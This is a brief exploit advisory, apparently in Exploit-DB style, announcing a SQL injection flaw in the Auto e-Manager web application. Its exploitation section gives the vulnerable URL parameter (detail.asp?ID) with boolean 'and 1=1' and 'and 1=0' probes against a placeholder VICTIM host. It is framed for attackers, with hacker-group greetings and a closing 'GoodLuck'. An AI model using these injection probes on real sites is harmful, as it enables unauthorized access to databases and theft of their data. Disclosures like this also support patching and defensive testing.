25 lines
No EOL
806 B
Text
25 lines
No EOL
806 B
Text
==================================================
|
|
Auto e-Manager <= SQL Injection Vulnerability
|
|
==================================================
|
|
|
|
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
[+] Author : KnocKout
|
|
[~] Contact : knockoutr@msn.com
|
|
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
|
|
{ H4X0RE SECURITY PROJECT }
|
|
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
~Web App. : Auto e-Manager
|
|
~Software: http://www.site2nite.com/
|
|
~Vulnerability Style : SQL Injection
|
|
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
~~~~~~~~ Explotation~~~~~~~~~~~
|
|
|
|
http://VICTIM/www/detail.asp?ID=654 {SQL Injection}
|
|
http://VICTIM/www/detail.asp?ID=654 and 1=1 {True}
|
|
http://VICTIM/www/detail.asp?ID=654 and 1=0 {False}
|
|
|
|
================================
|
|
|
|
GoodLuck. |